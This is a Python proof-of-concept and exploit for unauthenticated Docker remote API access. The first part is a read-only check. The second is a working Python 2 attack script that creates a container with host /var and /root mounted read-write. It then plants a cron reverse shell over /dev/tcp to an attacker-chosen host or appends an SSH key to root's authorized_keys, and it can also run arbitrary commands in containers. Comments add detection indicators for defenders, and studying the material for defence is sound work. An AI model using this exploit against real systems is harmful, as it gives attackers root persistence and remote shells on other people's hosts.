#POC
# Read-only check for a Docker Engine remote API that answers without
# authentication. A positive result means the daemon's TCP listener should be
# removed, or placed behind mutual TLS (dockerd --tlsverify) and network
# filtering.

#-*-coding:utf-8-*-

import requests

def verify(protocol,ip,port):
    """Report whether the Docker API at protocol://ip:port answers /version.

    Sends a single GET to <base>/version with no credentials and treats a
    response body containing the substring 'ApiVersion' as a finding.

    Args:
        protocol: URL scheme placed before '://'.
        ip: host part of the URL.
        port: port number; converted with str().

    Returns:
        A (found, url, msg) tuple. found is True only when 'ApiVersion' is in
        the response text. On any exception found is False and msg is the
        exception text.
    """
    url = protocol+'://'+ip+':'+str(port)
    print('testing if docker remote api unauth access vul')
    newurl = url + '/version'
    try:
        # verify=False switches off TLS certificate checks, so over https the
        # peer is not authenticated; confirm a hit from a trusted network path.
        response = requests.get(newurl,timeout=5,verify=False)
        # Substring match only: the status code and JSON structure are not
        # checked, so treat True as a lead to confirm rather than proof.
        if 'ApiVersion' in response.text:
            msg = 'There is a docker remote api unauth access vul in url:' + newurl + ' .'
            print(msg)
            return True, url,msg
        else:
            pass
    except Exception as e:
        # Timeouts, refused connections and TLS errors all end up here and are
        # reported as "not found" with the exception text as the message.
        msg = str(e)
        return False,url,msg
    msg = 'There is no docker remote api unauth access vul'
    return False, url, msg


#EXP
# Python 2 script (print statements, urllib2). docker.Client is the class name
# used by docker-py releases before 2.0.
# What the code below demonstrates: a caller who can reach an unauthenticated
# Docker API can create a container with host /var and /root bind-mounted
# read-write and then change host cron and SSH files from inside it.
# Things a defender can look for: containers with such binds, new lines in
# root's crontab or authorized_keys, and API requests from non-local clients.
#-*- coding:utf-8 -*-
import urllib2
import json
import sys
import getopt
from docker import Client

def http_get(url):
    """Return the raw response body of a GET request to url.

    No timeout is set and errors raised by urllib2.urlopen propagate.
    """
    response = urllib2.urlopen(url)
    return response.read()

def http_post(url, values):
    """POST values to url as application/json and return the raw body.

    values is sent unchanged as the request body, so it must already be
    serialized. This helper is not called anywhere in this listing.
    """
    jdata = values
    send_headers = {
        'Content-Type':'application/json'
    }
    req = urllib2.Request(url, data=jdata,headers=send_headers)
    response = urllib2.urlopen(req)
    return response.read()

def isset(v):
    """Return 1 if the expression string v evaluates without error, else 0.

    NOTE(review): this uses eval(). Every call in this file passes a fixed
    literal; it must never be given text from outside the program.
    eval() runs in this function's scope, so names inside v are looked up in
    the module globals, not in the caller's local variables.
    """
    try :
        type(eval(v))
    except:
        # Bare except: any failure, not only NameError/KeyError, counts as
        # "not set".
        return 0
    else:
        return 1

def printport(portsList, name):
    """Print one port mapping of container name, using '*' for missing keys.

    Each branch fills in one missing key and calls itself again until all four
    keys ('IP', 'Type', 'PublicPort', 'PrivatePort') are present.
    """
    # isset() looks up the module-level name portsList, which is the loop
    # variable at the call site in the __main__ block; it is the same dict as
    # this parameter only because the caller uses that name.
    if isset("portsList['IP']") == 0:
        portsList['IP']="*"
        printport(portsList,name)
    elif isset("portsList['Type']") == 0:
        portsList['Type']="*"
        printport(portsList,name)
    elif isset("portsList['PublicPort']") == 0:
        portsList['PublicPort']="*"
        printport(portsList,name)
    elif isset("portsList['PrivatePort']") == 0:
        portsList['PrivatePort']="*"
        printport(portsList,name)
    else:
        # host is not a parameter; it is read from the module globals set by
        # the -h option.
        print "[-]"+name+"[+]"+portsList['Type']+"[-]"+portsList['IP']+":"+str(portsList['PrivatePort'])+" --> "+host+":"+str(portsList['PublicPort'])

def createClient(host,port,version):
    """Return a docker Client for tcp://host:port.

    The API version comes from getversion(), and is printed before the client
    is built. host and port are concatenated, so both must be strings.
    """
    clientApiVersion = getversion(host,port,version)
    print "[-]ClientApiVersion:"+clientApiVersion
    cli = Client(base_url='tcp://'+host+':'+port,version=clientApiVersion)
    return cli

def getversion(host,port,version):
    """Return version if it is not '', else the daemon's reported ApiVersion.

    The GET to http://host:port/version is made in both cases, including when
    the caller supplied a version.
    """
    url = "http://"+host+":"+port+"/version"
    ret = json.loads(http_get(url))
    if version != '':
        clientApiVersion = version
    else:
        clientApiVersion = ret['ApiVersion']
    return clientApiVersion

def printContainer(host,port,version,allContainer):
    """Print Id, first name, image and status of the daemon's containers.

    allContainer == 1 requests every container (all=True); any other value
    uses the default cli.containers() listing.
    """
    cli = createClient(host,port,version)
    if allContainer == 1:
        ret = cli.containers(all=True)
    else:
        ret = cli.containers()
    for info in ret:
        print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"
        print "[-] id: "+info['Id']
        print "[-] Names: "+info['Names'][0]
        print "[-] Image: "+info['Image']
        print "[-] Status: "+info['Status']
        print "[+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++]"

if __name__ == "__main__":
    opts, args = getopt.getopt(sys.argv[1:], "v:kauVCcsLli:e:h:p:H:P:I:")
    key = 0
    version =''
    payload =''
    # Hard-coded public key string; the key body appears to have been stripped
    # from this copy of the listing.
    sshkey = 'ssh-rsa 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 wanniba@wanniba.com'
    # Each option only binds a module-level name. The code further down uses
    # isset() to test which of those names exist, so the names must stay at
    # module scope and keep their exact spelling (including lhsot).
    for op, value in opts:
        if op =="-l":
            imagesList = 1
        elif op == "-i":
            imageName = value
        elif op == "-e":
            dataExec = value
        elif op == "-h":
            host = value
        elif op =='-p':
            port = value
        elif op == '-L':
            portList = 1
        elif op == '-H':
            lhsot = value
        elif op == '-P':
            lport = value
        elif op =='-C':
            createContainer = 1
        elif op == '-v':
            version = value
        elif op == '-V':
            # Rebinds version to the int 1, replacing any string given by -v.
            version = 1
        elif op == '-c':
            closeContainer = 1
        elif op == '-I':
            imageId = value
        elif op == '-a':
            allContainer = 1
        elif op == '-s':
            startContainer = 1
        elif op == '-k':
            key = 1
        elif op == '-u':
            isUbuntu = 1

    # Builds a shell command that appends a once-a-minute cron line to a file
    # under /tmp/spool/cron. In the container created below, /tmp is the
    # host's /var, so the write lands in the host cron spool.
    # Indicator for defenders: root crontab lines that open /dev/tcp.
    if isset('lhsot') and isset('lport'):
        if isset('isUbuntu'):
            payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/crontabs/root"' # crontabs/ path; chmod 600 is applied after the write below
        else:
            payload = '/bin/bash -c "echo \\\"*/1 * * * * /bin/bash -i >& /dev/tcp/'+lhsot+'/'+lport+' 0>&1\\\" >> /tmp/spool/cron/root"' # CentOS, Red Hat and similar
        print "[-]Paylaod: "+payload
    # With -k this replaces the payload above with a command that appends
    # sshkey to /tmp1/.ssh/authorized_keys; /tmp1 is the host's /root in the
    # container created below.
    # Indicator for defenders: unexpected keys in root's authorized_keys.
    if sshkey !='' and key == 1:
        payload = '/bin/bash -c "echo \\\"'+sshkey+'\\\" >> /tmp1/.ssh/authorized_keys"'
        print "[-]Paylaod: "+payload
    if isset('host') and isset('port'):
        # version is always bound above, so only the == 1 test (set by -V)
        # decides this branch.
        if isset('version') and version == 1:
            url = "http://"+host+":"+port+"/version"
            ret = json.loads(http_get(url))
            print "[-] ApiVersion: "+ret['ApiVersion']
        elif isset('imagesList'):
            url = "http://"+host+":"+port+"/images/json"
            ret = json.loads(http_get(url))
            for info in ret:
                print "RepoTags: "+info['RepoTags'][0]
        elif isset('createContainer') and isset('imageName'):
            cli = createClient(host,port,version)
            # The binds map host /var to /tmp and host /root to /tmp1,
            # read-write. This mount is what turns API access into write
            # access to host files.
            container = cli.create_container(image=imageName, command='/bin/bash', tty=True, volumes=['/tmp','/tmp1'], host_config=cli.create_host_config(binds=['/var:/tmp:rw','/root:/tmp1:rw']))
            print "[-]Container ID:"+container['Id']
            print "[-]Warning:"+str(container['Warnings'])
            response = cli.start(container=container.get('Id'))
            if isset('isUbuntu'):
                cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))
                print "[-]create crontabs ......"
                cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd='chmod 600 /tmp/spool/cron/crontabs/root'))
                print "[-]chmod 600 ......"
            else:
                print cli.exec_start(exec_id=cli.exec_create(container=container.get('Id'), cmd=payload))
                print "[-]create crontabs ......"
        elif isset('closeContainer') and isset('imageId'):
            # Despite its name, imageId is passed as the container argument.
            cli = createClient(host,port,version)
            cli.stop(container=imageId)
            cli.remove_container(container=imageId)
        elif isset('startContainer') and isset('imageId'):
            cli = createClient(host,port,version)
            cli.start(container=imageId)
        elif isset('dataExec') and isset('imageId'):
            # Runs the -e string inside the container named by -I and prints
            # the output of the exec call.
            cli = createClient(host,port,version)
            print "[-]Command:"+dataExec
            print cli.exec_start(exec_id=cli.exec_create(container=imageId, cmd=dataExec))
        elif isset('portList'):
            url = "http://"+host+":"+port+"/containers/json"
            ret = json.loads(http_get(url))
            for pl in ret:
                if isset("pl['Names'][0]"):
                    name = pl['Names'][0]
                else:
                    name = '*'
                # The loop variable must be called portsList: printport()
                # probes that module-level name through isset().
                for portsList in pl['Ports']:
                    printport(portsList, name)
        else:
            # Default action: list containers.
            if isset('allContainer'):
                printContainer(host,port,version,allContainer)
            else:
                printContainer(host,port,version,0)